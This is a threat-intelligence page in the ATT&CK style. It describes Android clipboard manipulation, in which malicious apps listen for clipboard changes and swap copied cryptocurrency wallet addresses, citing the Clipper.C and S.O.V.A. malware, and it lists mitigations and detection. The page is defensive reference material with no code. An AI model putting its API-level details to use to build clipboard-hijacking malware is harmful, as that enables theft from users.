Data Manipulation: Transmitted Data Manipulation

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.

One method to achieve Transmitted Data Manipulation is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the ClipboardManager.OnPrimaryClipChangedListener interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10.

Adversaries may use Transmitted Data Manipulation to replace text prior to being pasted. For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.

Transmitted Data Manipulation was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.[1]

ID: T1641.001
Sub-technique of:  T1641
Tactic Type: Post-Adversary Device Access
Tactic: Impact
Platforms: Android
Version: 1.1
Created: 06 April 2022
Last Modified: 20 March 2023

Procedure Examples

ID Name Description
S1062 S.O.V.A.

S.O.V.A. can manipulate clipboard data to replace cryptocurrency addresses.[2]

Mitigations

ID Mitigation Description
M1006 Use Recent OS Version

Android 10 prevents applications from accessing clipboard data unless the application is on the foreground or is set as the device’s default input method editor (IME).[3]

Detection

ID Data Source Data Component Detects
DS0041 Application Vetting API Calls

Applications could be vetted for their use of the clipboard manager APIs with extra scrutiny given to application that make use of them.

References